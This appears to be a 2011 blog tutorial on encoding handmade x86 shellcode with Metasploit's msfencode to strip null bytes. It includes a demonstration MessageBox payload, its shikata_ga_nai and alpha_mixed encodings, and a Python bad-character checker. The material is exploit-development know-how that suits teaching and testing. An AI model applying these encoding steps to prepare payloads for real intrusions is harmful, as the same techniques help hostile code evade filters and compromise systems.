Monday, October 17, 2011

Encoding your handmade shell code using Metasploit Encoder

Encoding shell code matters in real-world exploitation because handmade shell code may contain bad characters, such as null bytes. Either the transmission protocol or the target application can be sensitive to these "bad characters", which can break your shell code in various ways.
Bad characters can mostly be eliminated by encoding the payload.

If you are using shell code that ships with the Metasploit framework, you don't have to worry about encoding: Metasploit encodes the payload by default when it is used in an exploit.
But in many situations you will use your own shell code in an exploit, and then that shell code must be free of bad characters.
To achieve that you can use Metasploit to encode your handmade shell code.

To get a list of all encoders present in the Metasploit framework, run ./msfencode -l (here restricted to the x86 architecture with -a x86):
root@bt:~#./msfencode -l -a x86

Framework Encoders (architectures: x86)
=======================================

Name                    Rank       Description
----                    ----       -----------
generic/none            normal     The "none" Encoder
x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
x86/countdown           normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha            low        Non-Alpha Encoder
x86/nonupper            low        Non-Upper Encoder
x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit   manual     Single Static Bit
x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

The default encoder in Metasploit is x86/shikata_ga_nai.

Suppose you have just written the following shell code:
"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
"\x72\x65\x89\xe3\x68\x61\x6e\x20"
"\x00\x68\x6f\x72\x65\x6c\x68\x62"
"\x79\x20\x43\x68\x6e\x65\x64\x20"
"\x68\x6e\x20\x70\x77\x68\x20\x62"
"\x65\x65\x68\x68\x61\x76\x65\x68"
"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
"\x50\x53\x51\x50\x50\xbe\xea\x07"
"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
"\x12\xcb\x81\x7c\xff\xe0";
To encode the shell code you first have to write it out to a binary file; any scripting language will do.

Here I will use Python. The string is a bytes literal and the file is opened in binary mode, so the null bytes and the bytes above 0x7f are written exactly as given:
shell = (b"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
         b"\x72\x65\x89\xe3\x68\x61\x6e\x20"
         b"\x00\x68\x6f\x72\x65\x6c\x68\x62"
         b"\x79\x20\x43\x68\x6e\x65\x64\x20"
         b"\x68\x6e\x20\x70\x77\x68\x20\x62"
         b"\x65\x65\x68\x68\x61\x76\x65\x68"
         b"\x59\x6f\x75\x20\x89\xe1\x31\xc0"
         b"\x50\x53\x51\x50\x50\xbe\xea\x07"
         b"\x45\x7e\xff\xe6\x31\xc0\x50\xb8"
         b"\x12\xcb\x81\x7c\xff\xe0")
# write the raw bytes to shellcode.bin (binary mode, so nothing is translated)
with open('shellcode.bin', 'wb') as f:
    f.write(shell)


After running the script you will get a shellcode.bin file. Now you are almost done: just run msfencode to encode the shell code for you. -i names the input file, -b lists the bytes the output must avoid (here only the null byte) and -t c prints the result as a C array.

root@bt:~#./msfencode -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)

unsigned char buf[] =
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24"
"\x93\x69\xac\xe5\x04\x18\x49\x60\x39\xb4\xf0\x1c\x9e\x45\x9b"
"\x8f\xac\x20\x37\x27\x33\xd2\xe7\xf4\xdb\x4a\x8d\x9e\x3b\xfb"
"\x23\x7e\x4c\x8c\xd3\x5e\xce\x17\x41\xf6\x66\xb9\xff\x63\x1f"
"\x60\x6f\x1e\xff\x1b\x8e\xd1\x3f\x4b\x02\x40\x90\x3c\x1a\x88"
"\x17\xf8\x1c\xb3\xfe\x33\x21\x1b\x47\x21\x6a\x1a\xcb\xb9\x8c";
This is the fully working shell code, now free of null bytes and of any other bad characters listed with -b.
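Whether the output really avoids the bytes given to -b is worth checking mechanically rather than by eye. The following Python 3 script is an added example and not part of the original post: it scans a byte string for bad characters and reports their offsets, and it parses the "unsigned char buf[] = ..." form that msfencode -t c prints back into bytes so the same check can be run on the encoded output. The sample inputs are the first 16 bytes of the handmade shell code above (which has a null at offset 4) and the first two lines of the x86/shikata_ga_nai output; the bad-character list is written in the same notation the -b flag takes.

```python
import re

# Bad-character list in the notation msfencode's -b flag uses, e.g. '\x00\x0a\x0d'.
BADCHAR_SPEC = r'\x00\x0a\x0d'

# First 16 bytes of the handmade shell code from the post (null byte at offset 4).
RAW_SHELLCODE = (b"\x68\x6c\x61\x6e\x00\x68\x43\x6f"
                 b"\x72\x65\x89\xe3\x68\x61\x6e\x20")

# Excerpt (first two lines) of the msfencode -t c output from the post, kept as C source.
ENCODED_C = r'''unsigned char buf[] =
"\xdb\xc9\x29\xc9\xbf\x63\x07\x01\x58\xb1\x14\xd9\x74\x24\xf4"
"\x5b\x83\xc3\x04\x31\x7b\x15\x03\x7b\x15\x81\xf2\x69\x34\x24";'''

HEX_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{2})')

def parse_badchars(spec):
    """Turn a '\\x00\\x0a' style list into a set of byte values."""
    return {int(h, 16) for h in HEX_ESCAPE.findall(spec)}

def find_badchars(shellcode, badchars):
    """Return (offset, value) for every byte of shellcode that is in badchars."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]

def parse_c_buf(text):
    """Parse the 'unsigned char buf[] = "..." "...";' C array back into bytes."""
    m = re.search(r'unsigned char buf\[\]\s*=\s*((?:"[^"]*"\s*)+);', text)
    if m is None:
        raise ValueError("no C buffer found in input")
    return bytes(int(h, 16) for h in HEX_ESCAPE.findall(m.group(1)))

def report(label, shellcode, badchars):
    """Print every hit and a summary line; return the list of hits."""
    hits = find_badchars(shellcode, badchars)
    for off, val in hits:
        print("%s: bad byte 0x%02x at offset %d" % (label, val, off))
    print("%s: %d bytes, %d bad" % (label, len(shellcode), len(hits)))
    return hits

if __name__ == "__main__":
    bad = parse_badchars(BADCHAR_SPEC)
    report("raw", RAW_SHELLCODE, bad)               # flags the null at offset 4
    report("encoded", parse_c_buf(ENCODED_C), bad)  # reports 30 bytes, 0 bad
```

To check a full msfencode run, read the whole -t c output into a string and pass it to parse_c_buf, or open shellcode.bin in 'rb' mode and pass its contents to find_badchars.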

The same shell code encoded with x86/alpha_mixed instead, selected with -e:

root@bt:~#./msfencode -e x86/alpha_mixed -b '\x00' -i /pentest/exploits/shellcode.bin -t c
[*] x86/alpha_mixed succeeded with size 218 (iteration=1)

unsigned char buf[] =
"\x89\xe3\xda\xc3\xd9\x73\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x43\x58\x42\x4c\x45\x31\x42\x4e\x45\x50\x42\x48\x50\x43\x42"
"\x4f\x51\x62\x51\x75\x4b\x39\x48\x63\x42\x48\x45\x31\x50\x6e"
"\x47\x50\x45\x50\x45\x38\x50\x6f\x43\x42\x43\x55\x50\x6c\x51"
"\x78\x43\x52\x51\x69\x51\x30\x43\x73\x42\x48\x50\x6e\x45\x35"
"\x50\x64\x51\x30\x45\x38\x42\x4e\x45\x70\x44\x30\x50\x77\x50"
"\x68\x51\x30\x51\x72\x43\x55\x50\x65\x42\x48\x45\x38\x45\x31"
"\x43\x46\x42\x45\x50\x68\x42\x79\x50\x6f\x44\x35\x51\x30\x4d"
"\x59\x48\x61\x45\x61\x4b\x70\x42\x70\x46\x33\x46\x31\x42\x70"
"\x46\x30\x4d\x6e\x4a\x4a\x43\x37\x51\x55\x43\x4e\x4b\x4f\x4b"
"\x56\x46\x51\x4f\x30\x50\x50\x4d\x68\x46\x72\x4a\x6b\x4f\x71"
"\x43\x4c\x4b\x4f\x4d\x30\x41\x41";